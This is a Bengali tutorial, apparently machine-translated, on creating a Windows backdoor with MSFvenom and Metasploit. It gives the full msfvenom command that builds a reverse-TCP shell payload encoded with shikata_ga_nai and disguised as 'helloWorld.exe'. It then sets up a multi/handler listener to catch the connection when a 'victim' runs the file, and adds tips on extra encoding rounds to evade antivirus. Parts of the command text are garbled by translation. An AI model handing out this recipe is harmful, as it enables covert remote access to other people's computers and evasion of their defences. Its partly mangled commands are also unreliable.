একটি পিছনের দরজা নিরাপত্তা ব্যবস্থা বাইপাস করতে ব্যবহৃত হয়, প্রায়ই গোপনে এবং বেশিরভাগই সনাক্ত করা যায় না। MSFvenom ব্যবহার করে, msfpayload এবং msfencode এর সমন্বয়ে, একটি ব্যাকডোর তৈরি করা সম্ভব যা বিপরীত শেল টিসিপি ব্যবহার করে আক্রমণকারীর সাথে সংযোগ স্থাপন করে। একটি পিছনের দরজা বিকাশের জন্য, আপনাকে আপনার ম্যালওয়্যারের স্বাক্ষর পরিবর্তন করতে হবে যাতে কোনও অ্যান্টিভাইরাস সফটওয়্যার এড়ানো যায়। এই প্রজেক্টটি একজোড়া কম্পিউটারে সম্পূর্ণ করুন যা আপনার অ্যাক্সেসের অনুমতি আছে এবং এই প্রক্রিয়ায় আপনি কম্পিউটার নিরাপত্তা এবং এই ধরনের ব্যাকডোর কীভাবে কাজ করে সে সম্পর্কে আরও জানতে পারবেন।
ধাপ
ধাপ 1. কালী শুরু করুন এবং টার্মিনাল কনসোল চালু করুন।
পদক্ষেপ 2. ইন্টারফেস প্রদর্শন করতে ifconfig টাইপ করুন এবং আপনার আইপি অ্যাড্রেস চেক করুন।
ধাপ 3. এনকোডারের তালিকা দেখানোর জন্য msfvenom -l এনকোডার টাইপ করুন।
আপনি এনকোডার হিসাবে x86/shikata_ga_nai ব্যবহার করবেন।
ধাপ 4. টাইপ করুন "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -এ x86 -প্ল্যাটফর্ম উইন্ডোজ আর্কিটেকচার ব্যবহার করার জন্য মনোনীত করে।
- -p windows/shell/reverse_tcp এম্বেড করার জন্য পেলোড নির্ধারণ করে।
- LHOST শ্রোতার আইপি ঠিকানা নির্ধারণ করে।
- LPORT শ্রোতা পোর্ট মনোনীত করে।
- -বি "\ x00" খারাপ চরিত্র (নাল বাইট) এড়ানোর জন্য মনোনীত।
- -e x86/shikata_ga_nai এনকোডার নাম নির্ধারণ করে।
- -f exe> helloWorld.exe ফরম্যাট আউটপুট নির্ধারণ করে।
ধাপ 5. Metasploit সক্রিয় করতে msfconsole টাইপ করুন।
এখন আপনি আপনার পিছনের দরজা তৈরি করেছেন। যখন ভুক্তভোগী helloWorld.exe এ ক্লিক করে, এম্বেড করা শেল প্লেলোড সক্রিয় হবে এবং আপনার সিস্টেমে একটি সংযোগ তৈরি করবে। সংযোগ পাওয়ার জন্য, আপনাকে মেটাসপ্লয়েটে মাল্টি-হ্যান্ডলার খুলতে হবে এবং পেলোড সেট করতে হবে।
ধাপ 6. ব্যবহার শোষণ/মাল্টি/হ্যান্ডলার টাইপ করুন।
ধাপ 7. টাইপ করুন সেট পেলোড উইন্ডোজ/শেল/রিভার্স_টিসিপি।
ধাপ 8. মডিউল চেক করার জন্য শো অপশন টাইপ করুন।
ধাপ 9. টাইপ করুন সেট LHOST 192.168.48.129।
"LHOST" শ্রোতার আইপি ঠিকানা নির্ধারণ করে।
ধাপ 10. টাইপ করুন সেট LPORT 4444।
"LPORT" শ্রোতা পোর্ট নির্ধারণ করে।
ধাপ 11. রান টাইপ করুন এবং ভুক্তভোগীর মেশিন থেকে সংযোগের জন্য অপেক্ষা করুন।
ধাপ 12. শিকারের জন্য অপেক্ষা করুন helloWorld.exe এ ক্লিক করুন।
তাহলে আপনি ভিকটিমের মেশিনের সাথে সফলভাবে সংযুক্ত হবেন।
পরামর্শ
- MSFvenom এ -i ব্যবহার করা এনকোডিং এর পুনরাবৃত্তি উপস্থাপন করবে। কখনও কখনও আরো পুনরাবৃত্তি AV সফটওয়্যার এড়াতে সাহায্য করতে পারে।
- আপনি MSFvenom ব্যবহার করে কিভাবে ব্যাকডোর এবং এনকোড তৈরি করতে হয় তা শিখেছেন, কিন্তু এই পদ্ধতিটি আজকাল কিছু AV সফটওয়্যারের বিরুদ্ধে পুরোপুরি কাজ করবে না। এর পিছনে কারণ হল MSFvenom এ এক্সিকিউশন টেমপ্লেট। এভি বিক্রেতারা এই টেমপ্লেটগুলির স্ট্যাটিক স্বাক্ষর যুক্ত করেছেন এবং কেবল তাদের সন্ধান করুন। এই সমস্যার সমাধান হল একটি ভিন্ন এক্সিকিউশন টেমপ্লেট বা বিভিন্ন টুল ব্যবহার করা।